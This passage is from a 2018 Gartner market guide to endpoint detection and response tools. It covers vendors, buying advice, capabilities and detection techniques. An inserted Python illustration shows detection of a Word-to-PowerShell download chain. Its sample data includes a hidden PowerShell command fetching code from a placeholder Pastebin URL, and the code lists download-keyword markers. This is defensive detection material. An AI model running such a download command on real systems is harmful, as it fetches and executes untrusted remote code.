Cynet 360
Endpoint Detection and Response
Endgame
enSilo
ESET
ESET Enterprise Inspector
Fidelis Endpoint
Endpoint Security
Rapid Detection & Response
Kaspersky Lab (see Note 4)
Endpoint Detection and Response
Endpoint Protection & Response
Active Response
Advanced Threat Protection
Guidance Endpoint Detection and Response
Adaptive Defense
RSA
NetWitness Endpoint
SentinelOne
Intercept X
Advanced Threat Protection
Threat Response
Apex One
Threat Detection & Response
Zenith
Source: Gartner (November 2018)

Market Recommendations

Before investing in EDR technology, EDR buyers should consider organizational maturity, incident response frequency and security vendor inventory. The key value of EDR solutions is detecting threats that have evaded other protection technologies.
Faster resolution of security alerts and faster incident response are key buying criteria for SOC teams. EDR tools can consolidate many alerts into fewer incidents and can be used for malware hunting. However, they require more experienced operators, are yet another agent and console to manage, and can increase false positives.
Organizations with mature security programs and SOCs that would like to improve incident response, reduce alert fatigue and begin hunting should invest in advanced EDR capabilities from dedicated EDR vendors.
Organizations that are maturing, and would like to improve the detection of advanced threats and incident response, will find that most solutions are better than what they are currently using. They should consider ease of use and guided investigations, as well as integration with incumbent security tools, to be critical capabilities.
Low-maturity organizations should invest in vulnerability and configuration management, and other controls before investing in EDR tools. Eventual investments in EDR should be as features of more comprehensive solutions that will improve prevention, as well as detect and respond.
Smaller organizations that are potential victims of advanced attacks, but have few IT resources, should invest in managed security service provider (MSSP) services that offer managed EDR solutions such as managed detection and response (MDR) services.

Note 1: Representative Vendor Selection

The vendors listed in this Market Guide have EDR products in the market that meet the market definition and have verifiable customers using the products.

Note 2: Capability Matrix

Basic common capability:
  • IOC-based detections
  • Manual hunting
  • Lack of attribution or threat intelligence
  • Limited remediation
  • Hunting = search query
More advanced capability:
  • On-agent detection and prevention
  • Integrated multiengine detection
  • Analytics/machine learning — anomaly detection
  • Behavioral detection — predeveloped and custom
  • Timeline threat graphic views
  • Guided investigations
  • Protection
  • Visual interface
  • Easy pivot
  • Asset tagging
  • Security state assessments
  • Root cause assessments
  • MSSP services
  • Cloud delivery
Advanced capability designed for dedicated SOC buyers:
  • Role-based access control (RBAC)
  • Workflow and case management
  • Community
  • Forensics — memory and disk forensics preservation and analysis
  • Open APIs for both inbound and outbound data sharing
  • Advanced hunting — memory analysis, disk analysis and UEBA-like algorithms
  • Deception
  • Attacker simulation — i.e., attack path
  • On-premises, optional delivery — larger-scale, tens of thousands of seats per server

Note 3: Detection Techniques

IOCs and object reputation information provide a low-cost approach, but represent a high volume of information to inspect. IOC information has a short useful life because it is the easiest part of the attack chain for adversaries to automatically change rapidly.
Inspecting portable executable files is the second-most-common technique. File census data (e.g., first seen, first run, certificates and VirusTotal score) should be used to surface suspect files for further analysis. Not all solutions inspect all file types, so ensure that prospective solutions inspect interpreted scripts, such as Java, PowerShell and Perl, and Office document macros. File inspection can be accomplished in several ways:
  • Signatures — Direct hashes of known files, stored in a local cache database or cloud database, are the standard of antivirus vendors. To be effective, signature databases should contain both good and bad files. This is a low-overhead detection method, but its limitations are well-known.
  • Algorithms — Trained machine learning detection methods are gaining in popularity. These solutions do not require the maintenance of a signatures database and are more accurate at detecting variants of known bad files. However, they are potentially subject to gaming the algorithm, and often cause high false-positive detections.
  • Emulated — Some solutions inspect the file code in real time, looking for partial matches to known bad code snippets. It is harder for attackers to change the entire code.
  • Sandboxed — Files are executed in a virtual environment and detected using behavioral detection methods.
Behavioral detection methods offer the highest flexibility and are often hard for attackers to evade with automation. A series of behaviors characterizes the tradecraft of the attack type, which is harder to change than individual files or hashes. Behavioral indicators can be high-level or lower in the stack — for example, at the user process or network level (e.g., a late-night admin account login, or nonstandard LAN/application traffic to a new external address). They can also be at the application level (e.g., a Word document spawns cmd.exe, which starts PowerShell with code downloaded from Pastebin) or the process level (e.g., process injection or dynamic-link library hijacking). Behavioral indicators are often late in the kill chain and, in some cases, may be too late if the attackers have already gained control and tampered with protection and detection techniques.
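As an added illustration (not from the Gartner guide or any vendor's product), the three detection layers described in this note applied to constructed process telemetry: a hash IOC match, file-census scoring, and the Office-to-shell download chain. All hashes, paths and the URL are placeholders.

```python
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str            # executable name, lowercased
    cmdline: str
    sha256: str           # constructed placeholder, not a real hash
    signed: bool          # valid code-signing certificate present
    first_seen_days: int  # days since the file was first seen fleet-wide
    prevalence: int       # number of endpoints that have run this file

KNOWN_BAD_HASHES = {"aaaa1111"}  # constructed IOC feed entry
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe"}
DOWNLOAD_MARKERS = ("pastebin.com", "downloadstring", "invoke-webrequest")

def ioc_hits(events):
    """Technique 1: hash IOC match. Cheap, but adversaries rotate hashes quickly."""
    return [e.pid for e in events if e.sha256 in KNOWN_BAD_HASHES]

def census_score(e):
    """Technique 2: file census data (first seen, signing, prevalence) surfaces suspects."""
    return 2 * (e.first_seen_days < 7) + 2 * (not e.signed) + 1 * (e.prevalence < 5)

def suspect_files(events, threshold=3):
    return [e.pid for e in events if census_score(e) >= threshold]

def office_spawned_downloads(events):
    """Technique 3: behavioral chain Office app -> (cmd.exe ->) shell that downloads code."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if e.image not in SHELLS or not any(m in e.cmdline.lower() for m in DOWNLOAD_MARKERS):
            continue
        anc = by_pid.get(e.ppid)
        while anc is not None and anc.image in SHELLS:  # skip intermediate shells
            anc = by_pid.get(anc.ppid)
        if anc is not None and anc.image in OFFICE_APPS:
            hits.append((anc.pid, e.pid))
    return hits

# Constructed telemetry: a macro-driven download chain plus one unknown binary.
SAMPLE = [
    ProcEvent(200, 1, "winword.exe", "winword.exe /n invoice.docm", "w1", True, 900, 9000),
    ProcEvent(210, 200, "cmd.exe", 'cmd.exe /c "%TEMP%\\run.bat"', "c1", True, 900, 9000),
    ProcEvent(220, 210, "powershell.exe", "powershell.exe -w hidden -c Invoke-WebRequest https://pastebin.com/raw/PLACEHOLDER", "p1", True, 900, 9000),
    ProcEvent(300, 1, "updater.exe", "updater.exe /silent", "aaaa1111", False, 1, 1),
]
```

Only the behavioral check ties the PowerShell download back to the Word document that launched it; the hash and census checks flag the unknown binary but say nothing about the macro chain.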

Note 4: Kaspersky Lab

In September 2017, the U.S. government ordered all federal agencies to remove Kaspersky Lab’s software from their systems. Several media reports, citing unnamed intelligence sources, made additional claims. Gartner is unaware of any evidence brought forward in this matter. At the same time, Kaspersky’s initial complaints have been dismissed by a U.S. District of Columbia court.
Kaspersky has launched a transparency center in Zurich where trusted stakeholders can inspect and evaluate product internals. Kaspersky has also committed to store and process customer data in Zurich, Switzerland. Gartner clients, especially those who work closely with U.S. federal agencies, should consider this information in their risk analysis and continue to monitor this situation for updates.
Source: https://www.gartner.com/doc/reprints?id=1-5Y6HEW5&ct=181214&st=sb&mkt_tok=eyJpIjoiTXpZelpURm1NVFl6WVRNMSIsInQiOiJrR2dCSVpoNXNzaXY3YkU3WGU2cXYwTVdYdldLbExDUENDUEhnTXh1bGhCY0QwcHBpSGNIQmNBVVpiMktyVG83alBSbXBkdmZBdmEwNGJ5Yk1LTGtRVFREaGV6dXlVdXMxMjhxaDBEUjZ2Z1hXcFwvTVN5NFwvUEErSThuT3NJQzF5In0%253D